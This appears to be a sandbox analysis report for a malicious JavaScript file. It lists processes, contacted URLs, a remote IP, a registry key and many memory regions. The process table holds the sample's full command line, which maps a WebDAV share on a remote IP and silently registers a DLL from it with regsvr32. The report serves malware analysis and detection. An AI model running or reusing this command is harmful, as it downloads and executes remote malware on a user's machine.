Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\12914116852002317391.js"
|
 |
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c timeout 1&&cmd /c net use \\94.159.113.84@8888\davwwwroot\ && cmd /c regsvr32 /s \\94.159.113.84@8888\davwwwroot\3951701412872.dll
|
|
|
|
C:\Windows\System32\cmd.exe
|
cmd /c net use \\94.159.113.84@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\net.exe
|
net use \\94.159.113.84@8888\davwwwroot\
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\timeout.exe
|
timeout 1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://94.159.113.84:8888/P
|
unknown
|
||
|
http://94.159.113.84:8888/tem=
|
unknown
|
||
|
http://94.159.113.84:8888/
|
unknown
|
||
|
http://94.159.113.84:8888/T
|
unknown
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
94.159.113.84
|
unknown
|
Russian Federation
|
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows Script\Settings\Telemetry\wscript.exe
|
JScriptSetScriptStateStarted
|
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
1CD8C9A6000
|
heap
|
page read and write
|
||
|
1CD8C5A7000
|
heap
|
page read and write
|
||
|
80AFC7C000
|
stack
|
page read and write
|
||
|
1CD8C9A6000
|
heap
|
page read and write
|
||
|
1CD8C9A4000
|
heap
|
page read and write
|
||
|
1CD8AAFA000
|
heap
|
page read and write
|
||
|
1CD8AAFD000
|
heap
|
page read and write
|
||
|
1CD8C5DB000
|
heap
|
page read and write
|
||
|
1CD8C691000
|
heap
|
page read and write
|
||
|
1CD8C5EF000
|
heap
|
page read and write
|
||
|
1CD8C9BA000
|
heap
|
page read and write
|
||
|
18271ED0000
|
heap
|
page read and write
|
||
|
18271E30000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C5BC000
|
heap
|
page read and write
|
||
|
1CD8C9A2000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C9A3000
|
heap
|
page read and write
|
||
|
1CD8CB83000
|
heap
|
page read and write
|
||
|
23C5DA40000
|
heap
|
page read and write
|
||
|
23C5DA45000
|
heap
|
page read and write
|
||
|
967C0FF000
|
stack
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C5A7000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8A947000
|
heap
|
page read and write
|
||
|
1CD8C748000
|
heap
|
page read and write
|
||
|
1CD8C9B1000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8CA09000
|
heap
|
page read and write
|
||
|
1CD8C9BC000
|
heap
|
page read and write
|
||
|
967BDAC000
|
stack
|
page read and write
|
||
|
1CD8C735000
|
heap
|
page read and write
|
||
|
1CD8A890000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C595000
|
heap
|
page read and write
|
||
|
1CD8C66B000
|
heap
|
page read and write
|
||
|
1CD8C791000
|
heap
|
page read and write
|
||
|
1CD8A959000
|
heap
|
page read and write
|
||
|
18271D65000
|
heap
|
page read and write
|
||
|
1CD8A958000
|
heap
|
page read and write
|
||
|
25D1799000
|
stack
|
page read and write
|
||
|
80AFB7E000
|
stack
|
page read and write
|
||
|
1CD8C690000
|
heap
|
page read and write
|
||
|
1CD8A888000
|
heap
|
page read and write
|
||
|
1CD8AAF5000
|
heap
|
page read and write
|
||
|
1CD8C5C7000
|
heap
|
page read and write
|
||
|
1CD8C61B000
|
heap
|
page read and write
|
||
|
1CD8A948000
|
heap
|
page read and write
|
||
|
1CD8C240000
|
heap
|
page read and write
|
||
|
1CD8C59C000
|
heap
|
page read and write
|
||
|
1CD8C997000
|
heap
|
page read and write
|
||
|
1CD8C603000
|
heap
|
page read and write
|
||
|
1CD8C595000
|
heap
|
page read and write
|
||
|
1CD8C9AB000
|
heap
|
page read and write
|
||
|
1CD8A8A1000
|
heap
|
page read and write
|
||
|
1CD8C5B5000
|
heap
|
page read and write
|
||
|
18271D6D000
|
heap
|
page read and write
|
||
|
18271E90000
|
remote allocation
|
page read and write
|
||
|
1CD8C5A7000
|
heap
|
page read and write
|
||
|
23C5BE00000
|
heap
|
page read and write
|
||
|
1CD8C5B4000
|
heap
|
page read and write
|
||
|
1CD8A6D0000
|
heap
|
page read and write
|
||
|
18271E90000
|
remote allocation
|
page read and write
|
||
|
1CD8A860000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C998000
|
heap
|
page read and write
|
||
|
18271DA9000
|
heap
|
page read and write
|
||
|
1CD8C999000
|
heap
|
page read and write
|
||
|
1CD8C591000
|
heap
|
page read and write
|
||
|
1CD8C5A7000
|
heap
|
page read and write
|
||
|
1CD8CA5D000
|
heap
|
page read and write
|
||
|
25D23FC000
|
stack
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8AAFA000
|
heap
|
page read and write
|
||
|
1CD8C633000
|
heap
|
page read and write
|
||
|
1CD8C9BC000
|
heap
|
page read and write
|
||
|
1CD8C590000
|
heap
|
page read and write
|
||
|
1CD8C748000
|
heap
|
page read and write
|
||
|
25D1EFF000
|
stack
|
page read and write
|
||
|
25D1DFF000
|
stack
|
page read and write
|
||
|
18271E90000
|
remote allocation
|
page read and write
|
||
|
80AFAFF000
|
stack
|
page read and write
|
||
|
1CD8C5B4000
|
heap
|
page read and write
|
||
|
1CD8AAFA000
|
heap
|
page read and write
|
||
|
1CD8C990000
|
heap
|
page read and write
|
||
|
1CD8A938000
|
heap
|
page read and write
|
||
|
1CD8C99A000
|
heap
|
page read and write
|
||
|
1CD8C64F000
|
heap
|
page read and write
|
||
|
1CD8C5BC000
|
heap
|
page read and write
|
||
|
1CD8C878000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C687000
|
heap
|
page read and write
|
||
|
1CD8C994000
|
heap
|
page read and write
|
||
|
1CD8C9AA000
|
heap
|
page read and write
|
||
|
1CD8C728000
|
heap
|
page read and write
|
||
|
1CD8A7B0000
|
heap
|
page read and write
|
||
|
1CD8A94B000
|
heap
|
page read and write
|
||
|
1CD8AAF0000
|
heap
|
page read and write
|
||
|
1CD8A94C000
|
heap
|
page read and write
|
||
|
80AFA7A000
|
stack
|
page read and write
|
||
|
1CD8C5A4000
|
heap
|
page read and write
|
||
|
1CD8C9BD000
|
heap
|
page read and write
|
||
|
1CD8C9AE000
|
heap
|
page read and write
|
||
|
1CD8C9A6000
|
heap
|
page read and write
|
||
|
23C5BF20000
|
heap
|
page read and write
|
||
|
1CD8CABE000
|
heap
|
page read and write
|
||
|
1CD8A953000
|
heap
|
page read and write
|
||
|
1CD8AAF9000
|
heap
|
page read and write
|
||
|
18271D95000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C9BC000
|
heap
|
page read and write
|
||
|
25D1BFE000
|
stack
|
page read and write
|
||
|
18271C40000
|
heap
|
page read and write
|
||
|
1CD8C9A3000
|
heap
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8C992000
|
heap
|
page read and write
|
||
|
1CD8C878000
|
heap
|
page read and write
|
||
|
1CD8C5B4000
|
heap
|
page read and write
|
||
|
1CD8A94D000
|
heap
|
page read and write
|
||
|
1CD8C9AA000
|
heap
|
page read and write
|
||
|
25D1AFE000
|
stack
|
page read and write
|
||
|
25D21FD000
|
stack
|
page read and write
|
||
|
1CD8C992000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
18271E50000
|
heap
|
page read and write
|
||
|
1CD8C5A7000
|
heap
|
page read and write
|
||
|
80AFBFE000
|
stack
|
page read and write
|
||
|
18271D38000
|
heap
|
page read and write
|
||
|
23C5BFD8000
|
heap
|
page read and write
|
||
|
1CD8C992000
|
heap
|
page read and write
|
||
|
18271DAF000
|
heap
|
page read and write
|
||
|
1CD8A938000
|
heap
|
page read and write
|
||
|
25D20FE000
|
stack
|
page read and write
|
||
|
1CD8C9A9000
|
heap
|
page read and write
|
||
|
23C5BFD0000
|
heap
|
page read and write
|
||
|
23C5BEE0000
|
heap
|
page read and write
|
||
|
1CD8C5B4000
|
heap
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8C9AC000
|
heap
|
page read and write
|
||
|
1CD8C9A3000
|
heap
|
page read and write
|
||
|
18271D5E000
|
heap
|
page read and write
|
||
|
1CD8C5B7000
|
heap
|
page read and write
|
||
|
1CD8C996000
|
heap
|
page read and write
|
||
|
1CD8A890000
|
heap
|
page read and write
|
||
|
1CD8C592000
|
heap
|
page read and write
|
||
|
1CD8A868000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8AAFE000
|
heap
|
page read and write
|
||
|
1CD8C735000
|
heap
|
page read and write
|
||
|
1CD8C59C000
|
heap
|
page read and write
|
||
|
1CD8C790000
|
heap
|
page read and write
|
||
|
18271ED5000
|
heap
|
page read and write
|
||
|
1CD8C9E1000
|
heap
|
page read and write
|
||
|
1CD8CA31000
|
heap
|
page read and write
|
||
|
1CD8A7D0000
|
heap
|
page read and write
|
||
|
1CD8C68E000
|
heap
|
page read and write
|
||
|
1CD8CA8D000
|
heap
|
page read and write
|
||
|
18271D30000
|
heap
|
page read and write
|
||
|
1CD8CABD000
|
heap
|
page read and write
|
||
|
25D1FFF000
|
stack
|
page read and write
|
||
|
18271D5E000
|
heap
|
page read and write
|
||
|
1CD8C597000
|
heap
|
page read and write
|
||
|
1CD8C9AA000
|
heap
|
page read and write
|
||
|
1CD8C99C000
|
heap
|
page read and write
|
||
|
80AFCFF000
|
stack
|
page read and write
|
||
|
1CD8C991000
|
heap
|
page read and write
|
||
|
1CD8C9A9000
|
heap
|
page read and write
|
||
|
18271D83000
|
heap
|
page read and write
|
||
|
1CD8C5B8000
|
heap
|
page read and write
|
||
|
1CD8C9A6000
|
heap
|
page read and write
|
||
|
967C07F000
|
stack
|
page read and write
|
||
|
1CD8C9A1000
|
heap
|
page read and write
|
||
|
18271D68000
|
heap
|
page read and write
|
||
|
1CD8A889000
|
heap
|
page read and write
|
||
|
1CD8C59A000
|
heap
|
page read and write
|
||
|
1CD8A94A000
|
heap
|
page read and write
|
||
|
1CD8C99B000
|
heap
|
page read and write
|
||
|
1CD8A954000
|
heap
|
page read and write
|
There are 174 hidden memdumps, click here to show them.